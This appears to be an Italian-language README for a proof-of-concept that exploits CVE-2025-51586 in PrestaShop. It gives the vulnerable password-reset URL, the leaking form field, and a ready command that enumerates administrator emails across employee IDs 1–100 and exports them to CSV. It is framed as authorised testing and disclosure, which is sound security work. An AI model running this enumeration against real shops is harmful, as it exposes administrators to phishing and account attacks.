
PrestaShop AdminLogin Email Enumeration PoC - CVE-2025-51586. This repository provides an ethical Proof-of-Concept (PoC) for the PrestaShop vulnerability allowing user enumeration through the AdminLogin password reset mechanism. It explains the impact, setup, and usage of the PoC script.
Questa repository contiene un Proof-of-Concept (PoC) etico per la vulnerabilità CVE-2025-51586, che interessa PrestaShop versioni 1.7.x — 8.2.2.
Il PoC enumera gli indirizzi email degli amministratori tramite il meccanismo di reimpostazione della password del Back Office (controller AdminLogin).
https://domain.tld/admin/index.php?controller=AdminLogin&reset=1id_employee valido e un reset_token non valido<input name="reset_email" value="[email protected]">Avviso ufficiale: Friends of Presta Security
Segnalato da Friends of Presta Security Team (avviso pubblicato il 4 settembre 2025).
Questo PoC è solo a scopo didattico e per test autorizzati. Usalo solo su sistemi di tua proprietà o su cui hai esplicita autorizzazione. L'autore e i collaboratori non sono responsabili di un uso improprio.
Clona e installa le dipendenze:
git clone https://github.com/7h30th3r0n3/CVE-2025-51586-PrestaShop-PoC.git
cd CVE-2025-51586-PrestaShop-PoC
pip install requests beautifulsoup4 rich
python3 cve_2025_51586_enum.py \
-u "https://target/admin/index.php?controller=AdminLogin&reset=1" \
-s 1 -e 100 -m POST -t invalidtoken123 --delay 0.5 --timeout 10 --export results.csv
PoC sviluppato da 7h30th3r0n3. Vulnerabilità scoperta da Friends of Presta Security Team.